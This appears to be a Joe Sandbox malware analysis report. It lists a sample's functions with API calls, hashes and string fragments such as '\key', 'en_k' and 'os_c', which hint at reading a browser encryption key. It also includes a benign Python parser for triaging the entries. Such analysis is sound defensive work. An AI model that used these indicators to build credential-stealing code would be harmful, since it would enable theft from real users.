Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: e54280c40aad7b6484d0e3cd1e0c814d2da3eed47338c420ab208c0738a2632e
• Instruction ID: 724a6467a4c9f2607037c1776e158027bbfde303fed3ec032e617537993171a7
• Opcode Fuzzy Hash: e54280c40aad7b6484d0e3cd1e0c814d2da3eed47338c420ab208c0738a2632e
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID: PK
• API String ID: 0-443340723
• Opcode ID: 646e92a25ca17630ac919cb883073e65421af8de64d3cd611baff82bd22d5b9c
• Instruction ID: 72074af9b3dc3a30bc19a63b9fa173c6164065b181d2bce6e412150fa4211560
• Opcode Fuzzy Hash: 646e92a25ca17630ac919cb883073e65421af8de64d3cd611baff82bd22d5b9c
• Instruction Fuzzy Hash: 7391B371208B42EFD709CF28C840A6AFBA2FF55314F44461DF4A5876A2D730E969CBD6
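The per-function entries above are machine-generated, and what an analyst usually wants from them is narrower: the direct API calls without the GetLastError/SetLastError subcall noise, the "ref:" addresses rebased from the dump's load address ("Offset: 00140000, based on PE: true") to image-relative RVAs so the xrefs can be found in the static sample regardless of ASLR, and a behaviour tag for the calls the report's signatures point at (EnumSystemLocalesW and GetLocaleInfoW for the locale query, SetUnhandledExceptionFilter for the crash/exception handling, the "PK" string as a ZIP-header hint). The Python below is an added example and is not Joe Sandbox's code or anything recovered from the sample; its input is a constructed excerpt of the entries on this page, and the tag names ("locale-query", "exception-filter", "zip-magic-prefix") are this example's own vocabulary, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Strings' entries, rebase refs to RVAs, tag behaviour."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: entry lines reproduced from the report section above,
# trimmed to the fields this parser reads.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• EnumSystemLocalesW.KERNEL32(00178E00,00000001), ref: 00178EDE
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• Opcode ID: 8e9318440a6c633cdbe4da1b42948de8854e520be20d27081bddb2048a3c758c
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0016E467,?,20001004,00000000,00000002,?,?,0016DA59), ref: 001720DD
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID: InfoLocale
• String ID:
• Opcode ID: ef91104b56e673f56037ec0b519bac4e94d06fa3f1b1e7440812ffbba2d6cf54
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001D550,0015D005), ref: 0015D53A
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• Opcode ID: e54280c40aad7b6484d0e3cd1e0c814d2da3eed47338c420ab208c0738a2632e
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID:
• String ID: PK
• Opcode ID: 646e92a25ca17630ac919cb883073e65421af8de64d3cd611baff82bd22d5b9c
"""

# One API line: optional "Part of subcall function <caller>: " prefix, then Name.MODULE(args), ref: <va>
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")

# Example-only triage vocabulary for the API names seen in this section (not Joe Sandbox signature names).
API_TAGS = {
    "EnumSystemLocalesW": "locale-query",
    "GetLocaleInfoW": "locale-query",
    "SetUnhandledExceptionFilter": "exception-filter",
}
# "PK" is only the first two bytes of the ZIP local-file-header magic (PK\x03\x04), so it is a weak hint.
STRING_TAGS = {"PK": "zip-magic-prefix (weak: full magic is PK\\x03\\x04)"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                     # virtual address of the call site in the dumped process
    direct: bool                 # False when the report lists it as part of a subcall
    caller: Optional[int] = None
    base: int = 0                # load address taken from the entry's "Offset:" field

    @property
    def rva(self) -> int:
        """Image-relative address of the call site, usable in the static PE whatever base ASLR picked."""
        return self.ref - self.base


@dataclass
class FunctionEntry:
    kind: str                    # "APIs" or "Strings"
    apis: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    base: int = 0


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the report text into one FunctionEntry per 'APIs'/'Strings' block."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            cur = FunctionEntry(kind=line)
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        m = API_RE.match(body)
        if m:
            cur.apis.append(ApiCall(
                name=m["name"], module=m["module"],
                args=[a for a in m["args"].split(",") if a],
                ref=int(m["ref"], 16),
                direct=m["caller"] is None,
                caller=int(m["caller"], 16) if m["caller"] else None,
            ))
        elif body.startswith("Source File:"):
            om = OFFSET_RE.search(body)
            if om:
                cur.base = int(om.group(1), 16)
                for call in cur.apis:     # API lines precede the dump source, so backfill the base
                    call.base = cur.base
        elif body.startswith("API ID:"):
            cur.api_id = body[len("API ID:"):].strip()
        elif body.startswith("String ID:"):
            cur.string_id = body[len("String ID:"):].strip()
        elif body.startswith("Opcode ID:"):
            cur.opcode_id = body[len("Opcode ID:"):].strip()
    return entries


def tag_entry(entry: FunctionEntry) -> List[str]:
    """Behaviour tags for one function; only direct calls count, subcall noise such as GetLastError is ignored."""
    tags = [API_TAGS[c.name] for c in entry.apis if c.direct and c.name in API_TAGS]
    if entry.string_id in STRING_TAGS:
        tags.append(STRING_TAGS[entry.string_id])
    return tags


def summarize(entries: List[FunctionEntry]) -> Dict[str, List[str]]:
    """Opcode ID -> tags, keeping only the functions that carry at least one tag."""
    return {e.opcode_id: tag_entry(e) for e in entries if tag_entry(e)}


if __name__ == "__main__":
    for e in parse_entries(SAMPLE_REPORT):
        for c in e.apis:
            kind = "call   " if c.direct else "subcall"
            print(f"{e.opcode_id[:12]} {kind} {c.name:<28} VA {c.ref:08X} RVA {c.rva:05X}")
        print(f"{e.opcode_id[:12]} tags: {tag_entry(e)}")
```

The RVA column is what you would use to jump to the call site in IDA or Ghidra on the static file: 0x178EDE in the dump becomes RVA 0x38EDE once the 0x140000 load address is subtracted. The subcall rows are kept for context but excluded from tagging, because GetLastError/SetLastError appear in almost every CRT helper and say nothing about behaviour.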
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID: i-8
• API String ID: 0-3871616529
• Opcode ID: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
• Instruction ID: ed9044c3e5d22265f9404dc7d371c9101d40ed022da828b10c4bcb04a24946f0
• Opcode Fuzzy Hash: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
• Instruction Fuzzy Hash: D1F096735011643B5B2CDE65DC56CBFB7ADDB89260706812EFC0AAB180CA20AC0081B4
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c17f53fd1331c3cf45bdd04f6ff31c753c5db3d640a5395b3023557dff7aef63
• Instruction ID: 4923732862588c7b95983d0954f57018c6d8059a5553b5c3ee17da9490a643c9
• Opcode Fuzzy Hash: c17f53fd1331c3cf45bdd04f6ff31c753c5db3d640a5395b3023557dff7aef63
• Instruction Fuzzy Hash: 9A126974A10A22AFC719CF29C5905A8FBB1FF59310BA44229EA5687F51D335F8A1CFD0
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c57a51d05784856d4c6b9f1aa7f7dd7787fe0f81c4f4ed946a41945fec95b2b6
• Instruction ID: 804be6ec7f0e59edda80821e67a68453f031d2dc7c9e9b420daf321695ddc6b1
• Opcode Fuzzy Hash: c57a51d05784856d4c6b9f1aa7f7dd7787fe0f81c4f4ed946a41945fec95b2b6
• Instruction Fuzzy Hash: EB12BE70A00B649FCB35CF29CC946AAB7F2BF95300F2448ADD59A57B62D731A985CF00
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 610e01b6890f6daa5765b7b373a3fa9b9fb77ed48dd0420f1a7c72bc73b9fbdb
                                                                                                                                                                                                • Instruction ID: 619c6885ed651d00bb3e03792f019c75fca7ef27293e553af0d0f7adb24a1225
                                                                                                                                                                                                • Opcode Fuzzy Hash: 610e01b6890f6daa5765b7b373a3fa9b9fb77ed48dd0420f1a7c72bc73b9fbdb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F11972E10609DFCF08CFA8D991AEDB7F2BF98350F248169D865A7344D734AA45CB60
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2cb9c604ba561f0e91f6ed6e537297a4bc819735b100087220e59304efea6d8c
                                                                                                                                                                                                • Instruction ID: 9b908812d3e21f809829f06eda9128a7faa6feceac2e3916093c993f17c622f9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cb9c604ba561f0e91f6ed6e537297a4bc819735b100087220e59304efea6d8c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF11875E006068FCB15CFA9C4806AEBBF1FF58310F64856EE89AE3750D734A981CB54
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                                • Instruction ID: 51377091e7176c853ca331b2e458d5ac35327798c320d0676b02a465824801fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32516D72D00219EFDF05CF99CC41AEEBBB2FF88314F198459E915AB201D735AA50CB90
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                                • Instruction ID: ee83307178c90f9d00305cea69383c9e668394e6b3334fabae9162b996500b35
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                                • Instruction Fuzzy Hash: F741C621219BC49FD739DE6C485109ABFE1DFB71017488A9DE4C797B43C310EA09C7A6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                                • Instruction ID: 5bbd262357bf4f0b45c86a1134383d6add417f0defdfabff8a8b311b850411da
                                                                                                                                                                                                • Opcode Fuzzy Hash: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A31252231ABC58FD719CA9D5C40546FFA1AEB210034DCA9DD4DD9BB03C564E909C7B2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                • Instruction ID: 7fd3fed2ae4cd16655d5c48b2de34c569c4a0f41ab493bace154078dadd1d9d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11277724118243D60ACABDCCB46BBA795EBCD321B2D43FAD0434B758D322A975E600
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f82fe5d51db342b635111ab47d67ed5d0cc256ef5c4054a715060750987e09ef
                                                                                                                                                                                                • Instruction ID: 8e3631a9919094d238eb7c47bd26fab6a5632f23f12f9b3358897c05a3c6193f
                                                                                                                                                                                                • Opcode Fuzzy Hash: f82fe5d51db342b635111ab47d67ed5d0cc256ef5c4054a715060750987e09ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9501A732D240710AA70C4A3A9C21432BBE4975731234B03ABF987EA0D1CA29D5A1D7E4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                                • Instruction ID: dd0801b8e2eec26d14fe6df224d4588831293bd56352e6c93cf2d5bcf62df5cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45F012725010296B9F19DFA4CC16CBF77A6EF58350B01812DFC1A5B150C731EC6197E4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015504A
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00155155
                                                                                                                                                                                                  • Part of subcall function 0014B64E: __EH_prolog3.LIBCMT ref: 0014B655
                                                                                                                                                                                                  • Part of subcall function 0014B07F: __EH_prolog3_GS.LIBCMT ref: 0014B086
                                                                                                                                                                                                  • Part of subcall function 00154DC7: __EH_prolog3_GS.LIBCMT ref: 00154DD1
                                                                                                                                                                                                  • Part of subcall function 00156920: __EH_prolog3_GS.LIBCMT ref: 00156927
                                                                                                                                                                                                  • Part of subcall function 001547EA: __EH_prolog3_GS.LIBCMT ref: 001547F4
                                                                                                                                                                                                  • Part of subcall function 001513E5: __EH_prolog3.LIBCMT ref: 001513EC
                                                                                                                                                                                                  • Part of subcall function 00154CF6: __EH_prolog3_GS.LIBCMT ref: 00154CFD
                                                                                                                                                                                                  • Part of subcall function 001568CD: __EH_prolog3.LIBCMT ref: 001568D4
                                                                                                                                                                                                  • Part of subcall function 00154FCB: __EH_prolog3_GS.LIBCMT ref: 00154FD2
                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 001555F3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3$InfoNativeSleepSystem
                                                                                                                                                                                                • String ID: !$.txt$/Up$1735725939$789593363246702628$MyApp/1.0$x64$x86
                                                                                                                                                                                                • API String ID: 782859002-3287460392
                                                                                                                                                                                                • Opcode ID: a825e88373deec475dea8d05a9ea103efa290139d88dd65939d5aa61b2ff93cc
                                                                                                                                                                                                • Instruction ID: d014ff5319f208823a766c8df616ae5147ae495557205d0345f6bd1c8b0a4ace
                                                                                                                                                                                                • Opcode Fuzzy Hash: a825e88373deec475dea8d05a9ea103efa290139d88dd65939d5aa61b2ff93cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F029130D04248EBDF15EBB4C95ABECBBB5AF25300F5440E9E4056B192EB745F88DB62
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00146B48
                                                                                                                                                                                                  • Part of subcall function 0015AE24: __EH_prolog3_GS.LIBCMT ref: 0015AE2E
                                                                                                                                                                                                  • Part of subcall function 0014B558: __EH_prolog3.LIBCMT ref: 0014B562
                                                                                                                                                                                                  • Part of subcall function 0014B558: _Func_class.LIBCONCRT ref: 0014B607
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                  • Part of subcall function 0014A42C: __EH_prolog3.LIBCMT ref: 0014A433
                                                                                                                                                                                                  • Part of subcall function 0014B41D: __EH_prolog3.LIBCMT ref: 0014B424
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?), ref: 00146C2D
                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00146C6A
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00146C74
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00146CFA
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00146D01
                                                                                                                                                                                                  • Part of subcall function 0014B51E: __EH_prolog3.LIBCMT ref: 0014B525
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3$Heap$H_prolog3_Process$AllocFreeFunc_classlstrlen
                                                                                                                                                                                                • String ID: \key$en_k$os_c
                                                                                                                                                                                                • API String ID: 3880169058-3393669898
                                                                                                                                                                                                • Opcode ID: 9e3df7a1df1893fc7ef59370f337ac94c2abc8b08014e56483b74c86b5f0f0a7
                                                                                                                                                                                                • Instruction ID: 94001cb7e1f3714e0bb11a3225d26ef478930cbb808be37534184490f1e8115c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3df7a1df1893fc7ef59370f337ac94c2abc8b08014e56483b74c86b5f0f0a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6671AE70D00248EFCF04EBA4CD89FDEBBB5AF65700F544158F505AB1A2DB705A49CBA2
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015AE2E
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: __EH_prolog3_GS.LIBCMT ref: 0015ABF9
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: ctype.LIBCPMT ref: 0015ACB5
                                                                                                                                                                                                  • Part of subcall function 0014B7BF: __EH_prolog3.LIBCMT ref: 0014B7C6
